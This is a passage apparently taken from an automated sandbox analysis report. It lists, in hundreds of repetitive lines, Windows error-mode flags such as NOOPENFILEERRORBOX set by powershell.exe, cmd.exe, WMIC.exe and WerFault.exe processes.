Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
